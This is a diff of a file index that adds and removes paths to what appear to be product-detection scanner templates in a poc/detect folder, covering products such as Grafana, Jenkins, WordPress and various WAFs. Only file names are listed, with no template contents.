-./poc/detect/dwr-index-detect-7136.yaml ./poc/detect/dwr-index-detect.yaml -./poc/detect/ec2-detection-7161.yaml ./poc/detect/ec2-detection-7162.yaml +./poc/detect/ec2-detection-7163.yaml +./poc/detect/ec2-detection.yaml ./poc/detect/eg-manager-detect-7182.yaml -./poc/detect/eg-manager-detect.yaml +./poc/detect/eg-manager-detect-7184.yaml ./poc/detect/elasticpot-honeypot-detection.yaml ./poc/detect/elasticsearch-sql-client-detect-7189.yaml ./poc/detect/elasticsearch-sql-client-detect-7190.yaml @@ -43122,18 +43088,20 @@ ./poc/detect/fatpipe-mpvpn-detect-7437.yaml ./poc/detect/fatpipe-mpvpn-detect-7438.yaml ./poc/detect/fatpipe-mpvpn-detect.yaml +./poc/detect/fatpipe-warp-detect-7439.yaml ./poc/detect/fatpipe-warp-detect-7440.yaml ./poc/detect/fatpipe-warp-detect.yaml ./poc/detect/favicon-detect.yaml -./poc/detect/favicon-detection-7441.yaml ./poc/detect/favicon-detection-7442.yaml ./poc/detect/favicon-detection-7443.yaml ./poc/detect/favicon-detection-7445.yaml +./poc/detect/favicon-detection-7446.yaml ./poc/detect/favicon-detection.yaml ./poc/detect/ffserver-detect.yaml ./poc/detect/firebase-detect-7492.yaml ./poc/detect/firebase-detect-7493.yaml -./poc/detect/firebase-detect-7494.yaml +./poc/detect/firebase-detect-7495.yaml +./poc/detect/firebase-detect-7496.yaml ./poc/detect/firebase-detect.yaml ./poc/detect/flink-version-detect.yaml ./poc/detect/flowci-detection.yaml @@ -43143,8 +43111,9 @@ ./poc/detect/fortiauthenticator-detect.yaml ./poc/detect/fortinet-detect.yaml ./poc/detect/froxlor-detect-7551.yaml +./poc/detect/froxlor-detect-7552.yaml +./poc/detect/froxlor-detect-7553.yaml ./poc/detect/froxlor-detect-7554.yaml -./poc/detect/froxlor-detect.yaml ./poc/detect/fuji-xerox-printer-detect.yaml ./poc/detect/gaspot-honeypot-detection.yaml ./poc/detect/geowebserver-detector.yaml @@ -43155,6 +43124,7 @@ ./poc/detect/getsimple-cms-detect-2.yaml ./poc/detect/getsimple-cms-detect-7614.yaml ./poc/detect/getsimple-cms-detect-7615.yaml +./poc/detect/getsimple-cms-detect.yaml ./poc/detect/getsimple-cms-detector-7611.yaml ./poc/detect/getsimple-cms-detector-7613.yaml ./poc/detect/getsimple-cms-detector.yaml @@ -43163,7 +43133,6 @@ ./poc/detect/gitbook-detect-7623.yaml ./poc/detect/gitbook-detect-7624.yaml ./poc/detect/gitbook-detect-7625.yaml -./poc/detect/gitbook-detect.yaml ./poc/detect/gitea-detect-1.yaml ./poc/detect/gitea-detect-2.yaml ./poc/detect/gitea-detect.yaml @@ -43173,6 +43142,7 @@ ./poc/detect/github-enterprise-detect-7650.yaml ./poc/detect/github-enterprise-detect-7651.yaml ./poc/detect/github-enterprise-detect.yaml +./poc/detect/gitlab-detect-7670.yaml ./poc/detect/gitlab-detect-7671.yaml ./poc/detect/gitlab-detect-7672.yaml ./poc/detect/gitlab-detect-7673.yaml @@ -43188,11 +43158,13 @@ ./poc/detect/goahead-detected.yaml ./poc/detect/gopher-detection.yaml ./poc/detect/gradle-cache-node-detect-7797.yaml +./poc/detect/gradle-cache-node-detect-7798.yaml ./poc/detect/gradle-cache-node-detect.yaml ./poc/detect/gradle-enterprise-build-cache-detect.yaml ./poc/detect/gradle-enterprise-build-cache-detect.yml ./poc/detect/grafana-detect-7805.yaml ./poc/detect/grafana-detect-7806.yaml +./poc/detect/grafana-detect-7807.yaml ./poc/detect/grafana-detect-7809.yaml ./poc/detect/grafana-detect.yaml ./poc/detect/graphite-browser-detect.yaml @@ -43200,7 +43172,7 @@ ./poc/detect/graphql-apollo-detect.yaml ./poc/detect/graphql-ariadne-detect.yaml ./poc/detect/graphql-detect-7829.yaml -./poc/detect/graphql-detect-7830.yaml +./poc/detect/graphql-detect-7831.yaml ./poc/detect/graphql-detect-7832.yaml ./poc/detect/graphql-detect.yaml ./poc/detect/graphql-dianajl-detect.yaml @@ -43224,29 +43196,27 @@ ./poc/detect/grav-cms-detect-7844.yaml ./poc/detect/grav-cms-detect-7845.yaml ./poc/detect/gunicorn-detect-7862.yaml -./poc/detect/gunicorn-detect-7863.yaml ./poc/detect/gunicorn-detect-7864.yaml ./poc/detect/gunicorn-detect-7865.yaml ./poc/detect/hanwang-detect-7881.yaml ./poc/detect/hanwang-detect-7882.yaml ./poc/detect/hanwang-detect.yaml +./poc/detect/harbor-detect-7886.yaml ./poc/detect/harbor-detect-7887.yaml ./poc/detect/harbor-detect-7888.yaml -./poc/detect/harbor-detect.yaml ./poc/detect/hash-detection.yaml +./poc/detect/herokuapp-detect-7937.yaml ./poc/detect/herokuapp-detect-7938.yaml -./poc/detect/herokuapp-detect-7939.yaml ./poc/detect/herokuapp-detect-7940.yaml ./poc/detect/herokuapp-detect.yaml ./poc/detect/hikvision-detection-1.yaml ./poc/detect/hikvision-detection-2.yaml -./poc/detect/hikvision-detection-7954.yaml ./poc/detect/hikvision-detection-7955.yaml ./poc/detect/hikvision-detection.yaml ./poc/detect/home-assistant-detect.yaml ./poc/detect/hp-blade-admin-detect-8003.yaml +./poc/detect/hp-blade-admin-detect-8004.yaml ./poc/detect/hp-blade-admin-detect-8005.yaml -./poc/detect/hp-blade-admin-detect.yaml ./poc/detect/hp-color-laserjet-detect.yaml ./poc/detect/hp-device-info-detect-8007.yaml ./poc/detect/hp-device-info-detect-8008.yaml @@ -43256,8 +43226,10 @@ ./poc/detect/hp-laserjet-detect-8027.yaml ./poc/detect/hp-laserjet-detect-8028.yaml ./poc/detect/hp-media-vault-detect-8029.yaml +./poc/detect/hp-media-vault-detect-8030.yaml ./poc/detect/hp-media-vault-detect-8031.yaml ./poc/detect/htpasswd-detection-8045.yaml +./poc/detect/htpasswd-detection-8046.yaml ./poc/detect/htpasswd-detection.yaml ./poc/detect/httpbin-detection.yaml ./poc/detect/httpbin-detection.yml @@ -43265,16 +43237,18 @@ ./poc/detect/ibm-aspera-version-detect.yaml ./poc/detect/ibm-odm-detect.yaml ./poc/detect/ibm-sterling-detect-8121.yaml -./poc/detect/ibm-sterling-detect.yaml +./poc/detect/ibm-sterling-detect-8122.yaml ./poc/detect/icewarp-panel-detect.yaml ./poc/detect/iis-detect.yaml ./poc/detect/iis-errorpage-detection-all-lang.yaml ./poc/detect/ilo-detect-8154.yaml ./poc/detect/ilo-detect-8155.yaml ./poc/detect/ilo-detect-8157.yaml +./poc/detect/ilo-detect.yaml ./poc/detect/ilo-upnp-detect.yaml ./poc/detect/influxdb-detect-8158.yaml ./poc/detect/influxdb-detect-8159.yaml +./poc/detect/influxdb-detect-8160.yaml ./poc/detect/influxdb-detect.yaml ./poc/detect/insecure-cipher-suite-detect.yaml ./poc/detect/iomega-lenovo-emc-shared-nas-detect-8182.yaml @@ -43285,16 +43259,15 @@ ./poc/detect/istat-panel-detect.yaml ./poc/detect/itop-detect-8201.yaml ./poc/detect/itop-detect-8202.yaml +./poc/detect/itop-detect-8203.yaml ./poc/detect/itop-detect.yaml ./poc/detect/jaspersoft-detect-8219.yaml -./poc/detect/jaspersoft-detect-8220.yaml ./poc/detect/jaspersoft-detect.yaml ./poc/detect/java-rmi-detect-8228.yaml -./poc/detect/java-rmi-detect.yaml ./poc/detect/javamelody-detect.yaml -./poc/detect/jboss-detect.yaml +./poc/detect/jboss-detect-8237.yaml ./poc/detect/jeecg-boot-detect-8247.yaml -./poc/detect/jeecg-boot-detect.yaml +./poc/detect/jeecg-boot-detect-8248.yaml ./poc/detect/jeedom-detect-8250.yaml ./poc/detect/jeedom-detect-8251.yaml ./poc/detect/jeedom-detect.yaml @@ -43305,9 +43278,8 @@ ./poc/detect/jellyfin-detect-8258.yaml ./poc/detect/jellyfin-detect-8259.yaml ./poc/detect/jellyfin-detect-8260.yaml -./poc/detect/jellyfin-detect.yaml ./poc/detect/jenkins-detect-8274.yaml -./poc/detect/jenkins-detect-8275.yaml +./poc/detect/jenkins-detect-8276.yaml ./poc/detect/jenkins-detect.yaml ./poc/detect/jenkins-headers-detect.yaml ./poc/detect/jenkins-login-detection.yaml @@ -43328,7 +43300,6 @@ ./poc/detect/kevinlab-device-detect-1.yaml ./poc/detect/kevinlab-device-detect-2.yaml ./poc/detect/kevinlab-device-detect-8461.yaml -./poc/detect/kevinlab-device-detect-8462.yaml ./poc/detect/kibana-detect-1.yaml ./poc/detect/kibana-detect-2.yaml ./poc/detect/kibana-detect-3.yaml @@ -43349,17 +43320,17 @@ ./poc/detect/liferay-portal-detect-1.yaml ./poc/detect/liferay-portal-detect-2.yaml ./poc/detect/liferay-portal-detect-8621.yaml -./poc/detect/liferay-portal-detect-8622.yaml ./poc/detect/liferay-portal-detect-8624.yaml ./poc/detect/liferay-portal-detect-8625.yaml +./poc/detect/liferay-portal-detect-8626.yaml ./poc/detect/liferay-portal-detect.yaml ./poc/detect/lightdash-detect.nuclei.yaml ./poc/detect/linkerd-badrule-detect-8629.yaml ./poc/detect/linkerd-badrule-detect-8630.yaml ./poc/detect/linkerd-badrule-detect-8631.yaml ./poc/detect/linkerd-badrule-detect.yaml -./poc/detect/linkerd-detect-8632.yaml ./poc/detect/linkerd-detect-8633.yaml +./poc/detect/linkerd-detect.yaml ./poc/detect/linkerd-service-detect-8634.yaml ./poc/detect/linkerd-service-detect-8635.yaml ./poc/detect/linkerd-service-detect.yaml @@ -43381,16 +43352,15 @@ ./poc/detect/magento-detect-1.yaml ./poc/detect/magento-detect-2.yaml ./poc/detect/magento-detect-8704.yaml -./poc/detect/magento-detect-8705.yaml ./poc/detect/magento-detect-8706.yaml ./poc/detect/magento-detect-8707.yaml +./poc/detect/magmi-detect-8714.yaml ./poc/detect/magmi-detect-8715.yaml ./poc/detect/magmi-detect-8716.yaml ./poc/detect/magmi-detect-8717.yaml -./poc/detect/magmi-detect.yaml ./poc/detect/mahara-version-detect.yaml ./poc/detect/maian-cart-detect-8718.yaml -./poc/detect/maian-cart-detect.yaml +./poc/detect/maian-cart-detect-8719.yaml ./poc/detect/mailoney-honeypot-detection.yaml ./poc/detect/mantis-detect-8781.yaml ./poc/detect/mantis-detect-8782.yaml @@ -43405,9 +43375,9 @@ ./poc/detect/metabase-detect.yaml ./poc/detect/mfiles-web-detect.yaml ./poc/detect/microsoft-echange-server-detect.yaml +./poc/detect/microsoft-exchange-server-detect-8851.yaml ./poc/detect/microsoft-exchange-server-detect-8852.yaml ./poc/detect/microsoft-exchange-server-detect-8853.yaml -./poc/detect/microsoft-exchange-server-detect.yaml ./poc/detect/microsoft-ftp-service-detect.yaml ./poc/detect/microstrategy-detect-1.yaml ./poc/detect/microstrategy-detect-10.yaml @@ -43426,12 +43396,13 @@ ./poc/detect/microstrategy-detect-8.yaml ./poc/detect/microstrategy-detect-9.yaml ./poc/detect/microweber-detect-8862.yaml -./poc/detect/microweber-detect-8863.yaml +./poc/detect/microweber-detect.yaml ./poc/detect/mikrotik-routeros-api-detect.yaml +./poc/detect/minio-console-detect-8884.yaml ./poc/detect/minio-console-detect-8885.yaml ./poc/detect/minio-console-detect.yaml +./poc/detect/minio-detect-8892.yaml ./poc/detect/minio-detect-8893.yaml -./poc/detect/minio-detect-8894.yaml ./poc/detect/minio-detect.yaml ./poc/detect/mitel-panel-detect.yaml ./poc/detect/mobileiron-version-detect.yaml @@ -43439,15 +43410,15 @@ ./poc/detect/moinmoin-detect-8916.yaml ./poc/detect/moinmoin-detect-8917.yaml ./poc/detect/moinmoin-detect-8918.yaml -./poc/detect/moinmoin-detect.yaml ./poc/detect/mongodb-detect-8919.yaml +./poc/detect/mongodb-detect-8920.yaml ./poc/detect/mongodb-detect-8921.yaml -./poc/detect/mongodb-detect.yaml ./poc/detect/moodle-version-detect.yaml -./poc/detect/moveit-detect.yaml +./poc/detect/moveit-transfer-detect.yaml ./poc/detect/mrtg-detect-1.yaml ./poc/detect/mrtg-detect-2.yaml ./poc/detect/mrtg-detect-3.yaml +./poc/detect/mrtg-detect-8958.yaml ./poc/detect/mrtg-detect-8959.yaml ./poc/detect/mrtg-detect.yaml ./poc/detect/ms-adcs-detect-8961.yaml @@ -43457,14 +43428,13 @@ ./poc/detect/mx-service-detector-8975.yaml ./poc/detect/mx-service-detector-8976.yaml ./poc/detect/mx-service-detector-8977.yaml -./poc/detect/mx-service-detector.yaml ./poc/detect/mybb-forum-detect.yaml ./poc/detect/nacos-detect.yaml ./poc/detect/nameserver-detection.yaml ./poc/detect/neos-detect-9013.yaml -./poc/detect/neos-detect.yaml +./poc/detect/neos-detect-9014.yaml ./poc/detect/nessus-detect.yaml -./poc/detect/netdata-dashboard-detected-9021.yaml +./poc/detect/netdata-dashboard-detected-9022.yaml ./poc/detect/netdata-dashboard-detected.yaml ./poc/detect/netgear-version-detect.yaml ./poc/detect/netsweeper-webadmin-detect-1.yaml @@ -43483,35 +43453,35 @@ ./poc/detect/nextcloud-owncloud-detect.yaml ./poc/detect/nexus-detect-9092.yaml ./poc/detect/nexus-detect-9093.yaml -./poc/detect/nexus-detect-9094.yaml ./poc/detect/nexus-detect-9095.yaml ./poc/detect/nexus-oss-detect.yaml ./poc/detect/nginx-Detect.yaml -./poc/detect/nginx-detect.yaml ./poc/detect/nginx-server-detection.yaml ./poc/detect/node-red-detect-9138.yaml ./poc/detect/node-red-detect-9139.yaml ./poc/detect/oauth2-detect-9180.yaml -./poc/detect/oauth2-detect-9181.yaml -./poc/detect/oauth2-detect-9182.yaml ./poc/detect/oauth2-detect-9183.yaml +./poc/detect/oauth2-detect.yaml ./poc/detect/octobercms-detect-1.yaml ./poc/detect/octobercms-detect-2.yaml ./poc/detect/octobercms-detect-9194.yaml -./poc/detect/octobercms-detect-9195.yaml -./poc/detect/octobercms-detect.yaml -./poc/detect/oidc-detect-9216.yaml +./poc/detect/octobercms-detect-9196.yaml +./poc/detect/oidc-detect-9217.yaml ./poc/detect/oidc-detect-9218.yaml +./poc/detect/oidc-detect.yaml +./poc/detect/oipm-detect-9219.yaml ./poc/detect/oipm-detect-9220.yaml ./poc/detect/oipm-detect-9221.yaml -./poc/detect/oipm-detect-9222.yaml ./poc/detect/oipm-detect.yaml ./poc/detect/olivetti-crf-detect-9242.yaml ./poc/detect/olivetti-crf-detect-9243.yaml +./poc/detect/olivetti-crf-detect-9244.yaml ./poc/detect/oneblog-detect-9245.yaml -./poc/detect/oneblog-detect-9247.yaml +./poc/detect/oneblog-detect-9246.yaml +./poc/detect/oneblog-detect.yaml ./poc/detect/open-virtualization-manager-detect-9325.yaml ./poc/detect/open-virtualization-manager-detect-9326.yaml +./poc/detect/open-virtualization-manager-detect.yaml ./poc/detect/openam-detect.yaml ./poc/detect/openam-detection-1.yaml ./poc/detect/openam-detection-10.yaml @@ -43534,7 +43504,6 @@ ./poc/detect/opencast-detect-9262.yaml ./poc/detect/opencast-detect-9263.yaml ./poc/detect/opencast-detect-9264.yaml -./poc/detect/opencast-detect-9265.yaml ./poc/detect/opencast-detect-9266.yaml ./poc/detect/openemr-detect-9271.yaml ./poc/detect/openemr-detect-9272.yaml @@ -43543,7 +43512,6 @@ ./poc/detect/opengear-detect.yaml ./poc/detect/opensis-detect-1.yaml ./poc/detect/opensis-detect-2.yaml -./poc/detect/opensis-detect-9314.yaml ./poc/detect/opensis-detect.yaml ./poc/detect/openssh-detect.yml ./poc/detect/openssh-detection.yaml @@ -43552,40 +43520,39 @@ ./poc/detect/openx-detect.yaml ./poc/detect/oracle-dbass-detect-9349.yaml ./poc/detect/oracle-dbass-detect-9350.yaml +./poc/detect/oracle-dbass-detect-9351.yaml ./poc/detect/owasp-juice-shop-detected-9414.yaml ./poc/detect/owasp-juice-shop-detected-9415.yaml -./poc/detect/owasp-juice-shop-detected-9416.yaml ./poc/detect/owasp-juice-shop-detected-9417.yaml ./poc/detect/owasp-juice-shop-detected-9418.yaml ./poc/detect/panel-detect.yaml ./poc/detect/parallels-hsphere-detect.yaml -./poc/detect/pega-detect-9473.yaml ./poc/detect/pega-detect-9474.yaml ./poc/detect/pega-detect-9475.yaml ./poc/detect/pega-detect-9476.yaml -./poc/detect/pega-detect.yaml ./poc/detect/pexip-detect.yaml ./poc/detect/pgsql-detect.yaml ./poc/detect/php-proxy-detect-1.yaml ./poc/detect/php-proxy-detect-2.yaml ./poc/detect/php-proxy-detect-9544.yaml +./poc/detect/php-proxy-detect.yaml ./poc/detect/phpcollab-detect-9500.yaml ./poc/detect/phpcollab-detect.yaml ./poc/detect/phpmyadmin-version-detect.yaml ./poc/detect/phpmyadmin-version-detection.yaml ./poc/detect/pi-hole-detect-9580.yaml -./poc/detect/pi-hole-detect-9582.yaml +./poc/detect/pi-hole-detect-9581.yaml ./poc/detect/pi-hole-detect-9583.yaml ./poc/detect/pi-hole-detect.yaml ./poc/detect/plone-cms-detect-9605.yaml +./poc/detect/plone-cms-detect-9606.yaml ./poc/detect/plone-cms-detect-9607.yaml -./poc/detect/plone-cms-detect-9608.yaml ./poc/detect/plone-cms-detect-9609.yaml ./poc/detect/plone-cms-detect.yaml ./poc/detect/polycom-admin-detect-9624.yaml ./poc/detect/polycom-admin-detect.yaml ./poc/detect/ppdetect.yaml -./poc/detect/prestashop-detect-9651.yaml +./poc/detect/prestashop-detect.yaml ./poc/detect/programming-language-detect.yaml ./poc/detect/prometheus-exporter-detect-9674.yaml ./poc/detect/prometheus-exporter-detect-9675.yaml @@ -43594,30 +43561,29 @@ ./poc/detect/prtg-detect-2.yaml ./poc/detect/prtg-detect-3.yaml ./poc/detect/prtg-detect-9703.yaml -./poc/detect/prtg-detect-9704.yaml ./poc/detect/prtg-detect-9705.yaml ./poc/detect/prtg-detect-9706.yaml ./poc/detect/prtg-detect.yaml ./poc/detect/prtg-version-detect.yaml ./poc/detect/pulse-secure-version-detect.yaml -./poc/detect/puppet-node-manager-detect.yaml -./poc/detect/puppetdb-detect-9717.yaml +./poc/detect/puppet-node-manager-detect-9720.yaml ./poc/detect/puppetdb-detect-9718.yaml ./poc/detect/puppetdb-detect-9719.yaml ./poc/detect/puppetserver-detect-9721.yaml -./poc/detect/puppetserver-detect-9722.yaml +./poc/detect/puppetserver-detect-9723.yaml ./poc/detect/puppetserver-detect.yaml ./poc/detect/qnap_nas_detect.yaml ./poc/detect/quantum-scalar-detect.yaml -./poc/detect/ranger-detection-9830.yaml ./poc/detect/ranger-detection.yaml ./poc/detect/rdp-detect-9838.yaml ./poc/detect/rdp-detect-9839.yaml +./poc/detect/rdp-detect-9840.yaml ./poc/detect/rdp-detect.yaml ./poc/detect/redash-detection.yaml +./poc/detect/redash-detection.yml ./poc/detect/redcap-detector-9848.yaml +./poc/detect/redcap-detector-9849.yaml ./poc/detect/redcap-detector-9850.yaml -./poc/detect/redcap-detector.yaml ./poc/detect/redfish-api-detect.yaml ./poc/detect/redfish-api-service-detect.yaml ./poc/detect/redis-detect.yaml @@ -43625,6 +43591,7 @@ ./poc/detect/redis-honeypot-detection.yaml ./poc/detect/redmine-cli-detect-9852.yaml ./poc/detect/redmine-cli-detect-9853.yaml +./poc/detect/redmine-cli-detect-9854.yaml ./poc/detect/redmine-cli-detect-9855.yaml ./poc/detect/redmine-cli-detect-9856.yaml ./poc/detect/redmine-cli-detect.yaml @@ -43638,8 +43605,9 @@ ./poc/detect/remkon-manager-detect.yaml ./poc/detect/reverse-proxy-detect.yaml ./poc/detect/rhymix-cms-detect-9876.yaml -./poc/detect/rhymix-cms-detect-9878.yaml +./poc/detect/rhymix-cms-detect-9877.yaml ./poc/detect/rhymix-cms-detect-9879.yaml +./poc/detect/rhymix-cms-detect.yaml ./poc/detect/riak-detect.yaml ./poc/detect/room-alert-detect.yaml ./poc/detect/routeros-version-detect.yaml @@ -43654,31 +43622,34 @@ ./poc/detect/s3-detect.yaml ./poc/detect/saas-service-detection.yaml ./poc/detect/sage-detect-9976.yaml -./poc/detect/sage-detect-9977.yaml ./poc/detect/sage-detect.yaml ./poc/detect/salesforce-aura-detect.yml ./poc/detect/salesforce-credentials-detect.yml ./poc/detect/samba-detect-9988.yaml -./poc/detect/samba-detect-9989.yaml +./poc/detect/samba-detect-9990.yaml ./poc/detect/samsung-printer-detect-9994.yaml ./poc/detect/samsung-printer-detect.yaml ./poc/detect/sap-cloud-connector-detect.yaml ./poc/detect/sap-igs-detect-10038.yaml ./poc/detect/sap-igs-detect-10040.yaml ./poc/detect/sap-igs-detect-10041.yaml +./poc/detect/sap-igs-detect.yaml ./poc/detect/sap-netweaver-as-java-detect.yaml ./poc/detect/sap-netweaver-detect-10042.yaml ./poc/detect/sap-netweaver-detect-10043.yaml ./poc/detect/sap-netweaver-detect-10044.yaml +./poc/detect/sap-netweaver-detect-10046.yaml ./poc/detect/sap-netweaver-detect-10047.yaml ./poc/detect/sap-netweaver-detect-10048.yaml ./poc/detect/sap-netweaver-detect.yaml -./poc/detect/sap-recon-detect-10062.yaml +./poc/detect/sap-recon-detect-10063.yaml ./poc/detect/sap-recon-detect.yaml ./poc/detect/sap-successfactors-detect.yaml ./poc/detect/saprouter-detect.yaml ./poc/detect/sceditor-detect-10092.yaml -./poc/detect/sceditor-detect-10094.yaml +./poc/detect/sceditor-detect-10093.yaml +./poc/detect/sceditor-detect.yaml +./poc/detect/secmail-detect-10109.yaml ./poc/detect/secmail-detect-10110.yaml ./poc/detect/secmail-detect-10111.yaml ./poc/detect/secmail-detect-10112.yaml @@ -43693,13 +43664,14 @@ ./poc/detect/server-backup-manager-se-login-detect.yaml ./poc/detect/shiro-deserialization-detection.yaml ./poc/detect/shiro-detect-10195.yaml +./poc/detect/shiro-detect-10196.yaml ./poc/detect/shiro-detect-10197.yaml -./poc/detect/shiro-detect.yaml ./poc/detect/shopizer-detect-1.yaml ./poc/detect/shopizer-detect-2.yaml ./poc/detect/shopware-detect-1.yaml ./poc/detect/shopware-detect-10210.yaml ./poc/detect/shopware-detect-10211.yaml +./poc/detect/shopware-detect-10212.yaml ./poc/detect/shopware-detect-10213.yaml ./poc/detect/shopware-detect-2.yaml ./poc/detect/sitemap-detect.yaml @@ -43708,7 +43680,7 @@ ./poc/detect/smartstore-detect-10333.yaml ./poc/detect/smartstore-detect-10334.yaml ./poc/detect/smb-v1-detect.yaml -./poc/detect/smb-v1-detection-10335.yaml +./poc/detect/smb-v1-detection-10336.yaml ./poc/detect/smb-v1-detection.yaml ./poc/detect/smtp-detect.yaml ./poc/detect/smtp-detection.yaml @@ -43716,8 +43688,8 @@ ./poc/detect/snapdrop-detect.yaml ./poc/detect/snare-honeypot-detection.yaml ./poc/detect/soa-detect.yaml +./poc/detect/solarwinds-servuftp-detect-10360.yaml ./poc/detect/solarwinds-servuftp-detect-10361.yaml -./poc/detect/solarwinds-servuftp-detect-10362.yaml ./poc/detect/solarwinds-servuftp-detect.yaml ./poc/detect/solarwinds-whd-version-detect.yaml ./poc/detect/somansa-dlp-detect.yaml @@ -43753,6 +43725,7 @@ ./poc/detect/tableau-server-detect-10643.yaml ./poc/detect/tech-detect-10672.yaml ./poc/detect/tech-detect-10673.yaml +./poc/detect/tech-detect-10674.yaml ./poc/detect/tech-detect-10675.yaml ./poc/detect/tech-detect-10676.yaml ./poc/detect/tech-detect-10677.yaml @@ -43761,9 +43734,9 @@ ./poc/detect/technologies-detection-workflow.yaml ./poc/detect/telerik-dialoghandler-detect-1.yaml ./poc/detect/telerik-dialoghandler-detect-10.yaml +./poc/detect/telerik-dialoghandler-detect-10687.yaml ./poc/detect/telerik-dialoghandler-detect-10688.yaml ./poc/detect/telerik-dialoghandler-detect-10690.yaml -./poc/detect/telerik-dialoghandler-detect-10691.yaml ./poc/detect/telerik-dialoghandler-detect-11.yaml ./poc/detect/telerik-dialoghandler-detect-12.yaml ./poc/detect/telerik-dialoghandler-detect-13.yaml @@ -43782,6 +43755,7 @@ ./poc/detect/telerik-fileupload-detect-10692.yaml ./poc/detect/telerik-fileupload-detect-10693.yaml ./poc/detect/telerik-fileupload-detect-10694.yaml +./poc/detect/telerik-fileupload-detect-10695.yaml ./poc/detect/telerik-fileupload-detect-10696.yaml ./poc/detect/telerik-fileupload-detect-10697.yaml ./poc/detect/telerik-fileupload-detect.yaml @@ -43789,17 +43763,15 @@ ./poc/detect/terraform-detect-10706.yaml ./poc/detect/terraform-detect-10707.yaml ./poc/detect/terraform-detect-10708.yaml -./poc/detect/terraform-detect-10709.yaml ./poc/detect/terraform-detect.yaml ./poc/detect/thinkcmf-detection-10717.yaml -./poc/detect/thinkcmf-detection-10718.yaml ./poc/detect/thinkcmf-detection-10719.yaml ./poc/detect/thinkcmf-detection.yaml ./poc/detect/thinkphp-debug-detected.yaml ./poc/detect/thruk-detect.yaml ./poc/detect/tingsboard-detect.yaml ./poc/detect/tomcat-detect-10792.yaml -./poc/detect/tomcat-detect-10793.yaml +./poc/detect/tomcat-detect-10794.yaml ./poc/detect/tomcat-detect-10795.yaml ./poc/detect/tomcat-detect.yaml ./poc/detect/tool-detect.yaml @@ -43813,7 +43785,7 @@ ./poc/detect/tyan-logo-detect.yaml ./poc/detect/tyan-rmm-ui-detect.yaml ./poc/detect/unauthorized-brother-access-detect.yaml -./poc/detect/unauthorized-puppet-node-manager-detect-10958.yaml +./poc/detect/unauthorized-puppet-node-manager-detect-10959.yaml ./poc/detect/unauthorized-puppet-node-manager-detect.yaml ./poc/detect/urls-detection.yaml ./poc/detect/vercel-detect.yaml @@ -43827,11 +43799,11 @@ ./poc/detect/virtual-ema-detect-2.yaml ./poc/detect/virtual-ema-detect.yaml ./poc/detect/vmware-airwatch-version-detect.yaml -./poc/detect/vmware-version-detect-11054.yaml ./poc/detect/vmware-version-detect-11055.yaml ./poc/detect/vmware-version-detect.yaml ./poc/detect/vmware-vrealize-detect-11056.yaml ./poc/detect/vmware-vrealize-detect-11057.yaml +./poc/detect/vmware-vrealize-detect.yaml ./poc/detect/vnc-detect-11061.yaml ./poc/detect/vnc-detect.yaml ./poc/detect/voipmonitor-detect.yaml @@ -43840,12 +43812,13 @@ ./poc/detect/vsftpd-detection-11075.yaml ./poc/detect/vsftpd-detection.yaml ./poc/detect/waf-detect-11086.yaml -./poc/detect/waf-detect-11088.yaml +./poc/detect/waf-detect-11087.yaml ./poc/detect/waf-detect-11089.yaml ./poc/detect/waf-detect-11090.yaml ./poc/detect/waf-detect-azure.yaml ./poc/detect/waf-detect-cloudflare.yaml ./poc/detect/waf-detect-incapsula.yaml +./poc/detect/waf-detect.yaml ./poc/detect/wagtail-cms-detect.yaml ./poc/detect/wamp-xdebug-detect-11101.yaml ./poc/detect/wamp-xdebug-detect-11102.yaml @@ -43853,7 +43826,6 @@ ./poc/detect/wamp-xdebug-detect-11104.yaml ./poc/detect/wamp-xdebug-detect.yaml ./poc/detect/wazuh-detect-11110.yaml -./poc/detect/wazuh-detect-11111.yaml ./poc/detect/wazuh-detect.yaml ./poc/detect/weave-scope-dashboard-detect-11118.yaml ./poc/detect/weave-scope-dashboard-detect-11119.yaml @@ -43861,15 +43833,12 @@ ./poc/detect/weave-scope-dashboard-detect.yaml ./poc/detect/web-framework-detect.yaml ./poc/detect/web-ftp-detect-11135.yaml -./poc/detect/web-ftp-detect-11136.yaml ./poc/detect/web-ftp-detect-11137.yaml -./poc/detect/web-suite-detect-11167.yaml +./poc/detect/web-ftp-detect-11138.yaml ./poc/detect/web-suite-detect-11168.yaml -./poc/detect/web-suite-detect.yaml ./poc/detect/webeditors-check-detect.yaml ./poc/detect/weblogic-bea_wls_internal-detect.yaml ./poc/detect/weblogic-detect-11142.yaml -./poc/detect/weblogic-detect-11143.yaml ./poc/detect/weblogic-detect-11144.yaml ./poc/detect/weblogic-detect-11145.yaml ./poc/detect/weblogic-detect-11146.yaml @@ -43877,7 +43846,7 @@ ./poc/detect/weblogic-iiop-detect-11148.yaml ./poc/detect/weblogic-iiop-detect.yaml ./poc/detect/weblogic-t3-detect-11151.yaml -./poc/detect/weblogic-t3-detect-11152.yaml +./poc/detect/weblogic-t3-detect-11153.yaml ./poc/detect/weblogic-t3-detect.yaml ./poc/detect/websphere-version-detect.yaml ./poc/detect/werkzeug-debugger-detect-11195.yaml @@ -43895,9 +43864,10 @@ ./poc/detect/wondercms-detect-11221.yaml ./poc/detect/wondercms-detect-11223.yaml ./poc/detect/wondercms-detect.yaml -./poc/detect/wordpress-detect-11261.yaml +./poc/detect/wordpress-detect-11260.yaml ./poc/detect/wordpress-detect.yaml ./poc/detect/wordpress-detect2.yaml +./poc/detect/wordpress-gotmls-detect-11280.yaml ./poc/detect/wordpress-gotmls-detect-11281.yaml ./poc/detect/wordpress-gotmls-detect.yaml ./poc/detect/wordpress-plugins-detect-11296.yaml @@ -43909,9 +43879,8 @@ ./poc/detect/wordpress-themes-detect.yaml ./poc/detect/wordpress-website-detect.yaml ./poc/detect/worksites-detection-11383.yaml -./poc/detect/worksites-detection-11384.yaml ./poc/detect/worksites-detection-11385.yaml -./poc/detect/worksites-detection.yaml +./poc/detect/worksites-detection-11386.yaml ./poc/detect/workspaceone-uem-airwatch-dashboard-detect.yaml ./poc/detect/wp-admin-detect.yaml ./poc/detect/wp-detect.yaml @@ -43932,10 +43901,10 @@ ./poc/detect/ws_ftp-ssh-detect.yaml ./poc/detect/wsdl-detect.yaml ./poc/detect/wso2-apimanager-detect-11637.yaml -./poc/detect/wso2-apimanager-detect-11638.yaml ./poc/detect/wso2-apimanager-detect-11639.yaml ./poc/detect/wso2-apimanager-detect.yaml ./poc/detect/wuzhicms-detect-11652.yaml +./poc/detect/wuzhicms-detect-11653.yaml ./poc/detect/wuzhicms-detect-11654.yaml ./poc/detect/wuzhicms-detect-11655.yaml ./poc/detect/wuzhicms-detect.yaml @@ -43953,13 +43922,13 @@ ./poc/detect/yzmcms-detect.yaml 